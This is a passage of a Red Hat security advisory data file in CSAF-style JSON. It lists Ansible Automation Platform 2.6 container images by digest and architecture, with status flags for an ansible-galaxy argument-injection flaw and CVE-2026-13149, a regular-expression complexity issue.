"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:53432365b9bb22c5df6da741687df208111fcabdea834a3fe9159b0ecf4b73df_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:9e0ca740576e5ddc2af43456f7a8b1dc74e37a4f0734236848b8fae58a0a2e8b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:38f097e4920d4e64c8b8839fcc353f4ff32e607719b5e36f23e208bc70d75b59_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:464caa10ae549dff7824e330f9d5e7e10aacf7b9ee056a6b4aa2768953c94fd8_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:9c7fea42d26e687c017aa573fa13b01ee738c88fe11e55317430e4e8b66d339c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0a2f84070918986561679893a78e6da279f7680fb7c00bddcc518974ba1e39c_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:361532ae39672ed922d1e23a09c99cc6f3e596e482c0180d9858346b584c9449_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:8a8db7f1d38de954a4d61f8a98cd91edfe182fcf78750fdaaeb3cf3654897a97_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:96403661397e470423486a3016ea895dc68885d9ba7f855921cda3825d974eb3_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:bf9c237fdc696c54f4263caac1c8784fd77a4a2d55dd59f31dc5008a809cf276_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:03b16022be5e25db2bf45e01526c42b782baba00c0b94175d5598fe65574460e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6051f354edc4b2e1143062dd5912d55e90f5db762fca6d7fa8df03bc29b06b0d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:87db0da260805165f54ef956c9e4b1e6a4f6e559306a35558696fb2861422cef_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:e7c8da3d2b7b9c2cfd4240a232b5a388e6ca09927b77b83ca95c66d0270846b0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:63ccd8ad711852fb955c10b1ee57fd3895e50220ce5f1877e58130a7ff8128a6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:6734e6c33e10a5511392126f447a92c57bfd2ef5f3c3650230a5910e3e20fcf1_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7576c16f17a67d327a1b275b34c1612ae3811c849ef163eb44a6c6013659382e_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7dfd8a045a5df672dc2b4f76bff307c0a78c1703e0572f10c1e07bd46e735947_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:08b6f737eed5ee48478db9bfaceb6e9339e2824ecc1973728c697ceae48a488f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:54621aa4ed969de8ec7e3d137178e35ba0fc61c43795e1bd0282c7219bb1d5b0_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:a9c0c6bcdcb061b85074a7e681c6152e7dc64b85571f2cc17001e18f26276ba8_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:da378637b565a2793993a1da503bf13f0c1f135e8cc5c6e569f9ee7c8617023c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:2f9958a2ab37aa25749d5cb9eb9d0dc8bf6b79846963c04f95d09bcc061431e9_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:63abb6f786ed50165351ec2f03649ef0ff5d05e06a939e2314c8b8b4729e803a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:ad9dd51cd467fa3da27d65919644e364baf3c62a7942c9261ea17b72875d7071_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f5cce04af00f9b56926d067e21e7e252b8d86226f1173f9840ff94d9e8e99d8b_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:3bb5c591fa83d61af4a21f63ab1e044aa56f86a89cbda17b77b98a2a3bb088b9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:6f03123e4543be01c7f3b592d55db7793a95d1983a1fe8c3ff2ad1c043cc54a4_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:b579af422da0bb4bc6fe17e598ca356e68957b566d9a607ff854ad6039572a56_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:eb6a63704d33b1dcb9eefea57763389c0eeb94c6206e63711c95ac3f0163753c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5148ead7df13311bd0b39fe2f02f4dc6f11d062598944c9b451a6c8e8b0c45f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5f8cfecd3442742b867aeba03ea24009fbd89b31cec0dc02eb02c4d9098dfcec_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a595b43d0efdd820048fbb9e7a8cefad5d2d20ae0d271fb16b34dd744b95e9eb_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:c1c608e5ee45a6d6248d7657e9b7f17cdb3f8342af9b5e94145217c6fb6efc2a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:71a2f5713323a2d2140d476cb48b66dedeb6f89faf88192dfe40da6c294e2089_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a85326093ec7a9ccde87ea243ad83934707fcef4871fccd934efcba50f355b94_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:af2444728b4c244f8e1b56a0f9d9c9325a1887987f25418833df09947f4ed7e5_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:e1daf0343f7b3e10b7843f85d64bd0ce35612e333597b7c5b48f033b7ec21c89_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:0c3c53caa8ccbea82dfc5dfe795e2e77fc84fd2a485cf0888a095ebe13305363_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:50cee84ad72794144820f6b6d08583387ab4e5f0a6d81ea495430290b173b1ea_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:660235348fa58da3e9a78c757e0cfc5b7f03c5760b9086d2876d87a20888f6a2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:ab5fb18f89334216119c70498585d74c689cdbf8fd21b5826b782d0b5427051f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:1a440c21e1d882875a73201b3135957387f0d7846678b22b52732e984931099a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:50f2bcf49966112665eb82a30e199af6041624e5cdb2372a85075405acf63ab8_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:a4927ab07375561c595afb1898ea52e28a9efb6910bee1011332d23344052e3f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:f69d4d8b4e9ad3666d4fa1aced7a01136f738b49f9c818ee71f7fbd44ff111ec_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:45057e5ae8e5a7bb6646bd7896707859539039e409ac334e8cb3eb99c554e031_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:5565418214a3480ba6e3a85f56838678549e515e374535813dfdc03700950cb7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:9e97f4cb07e63cc820b988ff3bf7079a087f596341399339f9a94d056ac69301_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:fe1c1dc037cf3e7e690092c761452de7111a899c73512ae9132479f7262139f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:544021b673fcef3bfe5291e0e82ed387d93735b52c983cd7b8b15779f4676ac1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d0230cc8ceaa4a82381b566d3661a49567f62c47ec8da11e8c96550e30bcb88f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d1246fb6fa7ff8221d88c00d73fa59ccfdc09eb3260af45adc8ddf568c5a0398_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:f5c7dd391581c2549b57ea4a5f61133221d19951ac45ff10952bc26048b71975_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:389567d267aab51c7fce52a23439c821995099cec9e37f5962a5dc2114597f84_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:417900ad18144b608fd23c8106aa8824048176eaf5f41eff1af47c43c75b7a89_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:d4c4bb796641f32563ce478b6fc912d1d809b83220a8843cd440ffadb788d17f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:e607ceaa2e3e14859f1ad60b394a1a896c5505662fa17b10f5afd532bda8be9f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:24d7574341fa646e12ca5180a655271b9d947907af80da860b2dab0b51442d12_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:405eeb4b9ece480096d6b4246999ed043c5c2af47006b50677a5f83df870fbe9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:653fd44dc56da7c4405e458fdcafdc358e323b1d917b97483cf37068da484088_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:77acabaa8cabde7fca8b90fffd651da92eacd54da6eb76933c749656535ef55c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9683a91e7d16893fe030e1701a2500d1e79c7bea0ab7557438b53d281acd14e4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9c3bee41f02ed223da8fd3e7a5fc73a67ef82837b947f785a85c6de742c2c75a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a15644ebe6166a891d02fd672fa1c83242713096d3754a2fd20aa0627ccf45bf_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a217de550b6a6509eca369318e2bd9585a70c67756ac9980f933b548de668f8d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:184a16150bdf285e1a32a0901871b8fcee6be9529e95de219fd4702d27eeadf0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:461fc04f1bc051c5ce6ced0e7d7179e9078dd5545eced38bdc37df7a9c06e722_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:64a02cef795fdf08d8b1d5c8bcc96c21c0196360ee3976a4afe5bdae98d3bf77_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:ba3d764e2fcd2d4a8e145a1559bcf9c6daa006c1844ec0f22fecddd18fb39deb_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:33d841d14081ec5f0289e79b6644acb4b5a038f59191493d763d7db4328aeb94_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:7a40a0df543d520528dc35c3fe1c224b298bf24858f29bbedd879f1b23396f55_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:b13680f6f1c058afdca28132b54195532c8cbc0ac634d16591c1a98088933768_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:e037940ea94d2cf16586ec35000a890066860865e992949a28b0a52e18b8b3fa_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:118ad39a5e775943911f5ec803eea0051dc1c720a4b3d3402394e68fa5ca7ca7_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:18f55feaae83ee6506b3af76cdd511687e82995440f87af6e9b9aefa06e726ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:644bdbea9feb95628cb142c21d52a2357261a9fd2386ffae978971dd68cad3ec_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:db407b56e08976d1a1014d6248ef3719e3b15dc2171d5281b21a865252c8016a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:0e36aa1324c5cb24a1217dfb477731e386311c29880dc76453756aca4776080a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:16a9f451252541eb555f27528fc547724345767b364d913323077743b84b1b7b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:787d0e6df45128836d907732ca546d054f10f2fd8708ec6fdbdb2418f9445066_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:d7869fb6e7fce7a1a26841475449f9c7c0b9c29445f5c9c5bd226abfa4ba7f26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:033fec39621ff64fd83905a4d656ecce7907f7c5531855253a682f414702561d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5eaeaaf91e9d13054c54d3060ba8380b42b72d1087612f65baca29c036d593a9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:9bb6427006e96866392ac8804990b85f9ae7b5f4f1575e7d6123a3ab8d4b365e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:a6ecee20b39158df405c56ed811a882c2ea82a996308b51fad6ac659c669c566_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:62c5e15e425dd562e0a8199e437cdbd2f29e239bd758c25c893ef0a60e767128_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f72a736351733cb24b8243647309abcdf086f0cb8fe59e12a3e95510917dfb4d_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "ansible-core: argument injection in ansible-galaxy role install leads to arbitrary code execution"
},
{
"cve": "CVE-2026-13149",
"cwe": {
"id": "CWE-1333",
"name": "Inefficient Regular Expression Complexity"
},
"discovery_date": "2026-06-30T10:00:59.843854+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:1e388383c5111049bb8f2d1f37fcee6773067152d256492f7e9db908d52b4652_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:6458f36f24c26733e1a052ce8a1beac8efed6da6574133103d8dc7b868e580b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:b1561aa0c5cdc34467541dddd7be145859c3d3d041989d483eb54a720a65ec26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:dbaddb3974c4ca1a4f7e58b0a3d91ba7d2d946100cf55c6acd740a61ad2fb143_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:5049e7dd3ec73b82a0fdc7ba1f5c2ce7bfc4bfee023af24133d1c48eb2838d50_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:7c971a91ac52f6d5e8702548923890afb2aa586731c5092396d3e769516fb7ed_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:c4bc8ce6d217e861df5c0228812c612e9b1c200f3654b26e8bdfd36642b79c57_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:ec267e7bd945593d9bcd3be6201176e5b28376cdd5900d5da8c6f033b0420558_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:97b8905f103277144991667b7953a08fd7a7b2edc448a3d5b5195f1af6802014_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:d7fb722c1e4646d29ee32f5f9a74f7da3c87e07da52a7f28d58017931d375305_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e779c125e7fd9307e117fc7f4e4411f450871417f0447deb68c3821c26cae764_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e8113d25fd42fc3a31dc9bb120764c3b508995c23f73f7e99e0200ac411ad229_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2a24b3e44cd208c8176d4739cf3fc7a19e9fff3b531ab7718de6f5a99db4e4d1_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:47fa330b3fe99501ba7d4b4bb5bc8b5ba0ea7880472070b27250b36fce3d035c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:71a06d4925ea829abc69b3ab518f08844faeaf524bad4c1e6fbc658b8227e0ab_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:fa606a224ac6d3d5e17650a9b9a52e5cb76af57dc767adf79609e0ab95081304_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:08cca1f9a75b0352f17d517f6b7bab53ccf7fba7ef1ff5cedf777c5b68dd15fa_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:381cb54bf157086017cfea6db2a32895b6109640520b4f35f4791b2295c0db29_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:8acf8e32e0dfca8b9a4cfcd765509424a8c1b884ad382a5f21d58e8c44e56cae_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:b46b200558db6b92db270ee3749b8d14b778208ab9ab59e2b7c00dc018d2f3ce_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:30745071ac71a3fdd97d062f180c8fd05d75d9955d4cfccbcf2aeec8deb7f084_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:3ce796ad0c27b82cd6ba0cd946da69e2d62ad392f60dff571a6e826ab17dd8bc_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5c06c479d96b8340382301cb60505f05afcb064d3daf3951df9d8a108b1e4a97_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c0a8ca9591bb9385e2a8773aedbb40f84f4f4f229b0ec1b9bf16c4cedef2f6ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:a48db0666b33ef1be5ab4ff02d7584c3fa1516c8a18f09295ae6a220d2e2ebf6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:b475aea1e95b14a065f76a83e5c8aa74f274955297762808f059ed857cd9cb92_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:bf591d6bc29f3c394b29fd34b0a458cee5c3368130f1aa1e226e49fd112c44fc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:e7369d9a7242b115b78f7ff72c1a59912fb8304e93220a6faeaf44c25c6b5a71_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2a12a79a557dd5e32b77eb977c3698ae2191f015121d38689369ae39f22a5f11_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:3b61f49f0dd276d22d67f3e97fb9ffa3382b4a086416f6e59b20ec3e492871cd_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:53432365b9bb22c5df6da741687df208111fcabdea834a3fe9159b0ecf4b73df_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:9e0ca740576e5ddc2af43456f7a8b1dc74e37a4f0734236848b8fae58a0a2e8b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:38f097e4920d4e64c8b8839fcc353f4ff32e607719b5e36f23e208bc70d75b59_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:464caa10ae549dff7824e330f9d5e7e10aacf7b9ee056a6b4aa2768953c94fd8_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:9c7fea42d26e687c017aa573fa13b01ee738c88fe11e55317430e4e8b66d339c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0a2f84070918986561679893a78e6da279f7680fb7c00bddcc518974ba1e39c_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:361532ae39672ed922d1e23a09c99cc6f3e596e482c0180d9858346b584c9449_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:8a8db7f1d38de954a4d61f8a98cd91edfe182fcf78750fdaaeb3cf3654897a97_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:96403661397e470423486a3016ea895dc68885d9ba7f855921cda3825d974eb3_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:bf9c237fdc696c54f4263caac1c8784fd77a4a2d55dd59f31dc5008a809cf276_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:03b16022be5e25db2bf45e01526c42b782baba00c0b94175d5598fe65574460e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6051f354edc4b2e1143062dd5912d55e90f5db762fca6d7fa8df03bc29b06b0d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:87db0da260805165f54ef956c9e4b1e6a4f6e559306a35558696fb2861422cef_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:e7c8da3d2b7b9c2cfd4240a232b5a388e6ca09927b77b83ca95c66d0270846b0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:63ccd8ad711852fb955c10b1ee57fd3895e50220ce5f1877e58130a7ff8128a6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:6734e6c33e10a5511392126f447a92c57bfd2ef5f3c3650230a5910e3e20fcf1_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7576c16f17a67d327a1b275b34c1612ae3811c849ef163eb44a6c6013659382e_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7dfd8a045a5df672dc2b4f76bff307c0a78c1703e0572f10c1e07bd46e735947_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:08b6f737eed5ee48478db9bfaceb6e9339e2824ecc1973728c697ceae48a488f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:54621aa4ed969de8ec7e3d137178e35ba0fc61c43795e1bd0282c7219bb1d5b0_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:a9c0c6bcdcb061b85074a7e681c6152e7dc64b85571f2cc17001e18f26276ba8_amd64",
